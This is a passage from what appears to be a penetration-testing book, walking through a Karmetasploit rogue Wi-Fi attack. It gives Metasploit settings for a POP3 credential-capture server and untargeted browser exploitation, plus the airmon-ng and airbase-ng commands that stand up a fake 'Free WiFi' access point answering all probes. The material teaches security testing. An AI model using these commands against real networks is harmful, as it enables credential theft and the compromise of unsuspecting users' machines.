Karmetasploit
179
set SRVPORT 55550
set URIPATH /ads
run
use auxiliary/server/capture/pop3
set SRVPORT 110
set SSL false
run
After loading the database (
db_connect postgres:toor@127.0.0.1/msfbook
)
in which to store its results, KARMA loads the
browser_autopwn
server as shown
at . This is a handy way to attempt a number of exploits against a browser
in an untargeted manner. A handful of the browser-based exploits in the
Framework contain the directive
include Msf::Exploit::Remote::BrowserAutopwn
:
Exploits that contain that include line will be attempted when the autopwn
server is accessed.
At and , the local IP address is set to
10.0.0.1
, which coincides with
the default DHCP configuration. Then, in lines and on, the various servers
are configured and started. (To get a complete picture of what occurs in this
attack, read the resource file.)
Next, we place our wireless card in monitor mode. The way in which we
do this depends on our wireless card’s chipset. The wireless card in the fol-
lowing example uses the RT73 chipset. We use
airmon-ng start wlan0
to place
it in monitor mode:
root@bt:/opt/metasploit3/msf3#
airmon-ng start wlan0
NOTE
If your card uses a different chipset from the one used in this example, visit the
Aircrack-ng website
(http://www.aircrack-ng.org/)
for specifics on how to place
your card in monitor mode.
Launching the Attack
The
airbase-ng
component of the Aircrack-ng suite is used to create Karmeta-
sploit’s fake access point. In the next example, we configure the
airbase-ng
access point to respond to all probes (
-P
), to beacon every 30 seconds (
-C 30
)
with the ESSID Free Wi-Fi (
-e "Free WiFi"
), and to be verbose (
-v
) using the
interface
mon0
:
root@bt:/opt/metasploit3/msf3#
airbase-ng -P -C 30 -e "Free WiFi" -v mon0
14:06:57 Created tap interface
at0
14:06:57 Trying to set MTU on at0 to 1500
14:06:57 Trying to set MTU on mon0 to 1800
14:06:57 Access Point with BSSID 00:21:29:E2:DE:14 started.
As you can see at , Airbase-ng creates a new interface called
at0
. Kar-
metasploit will use this interface.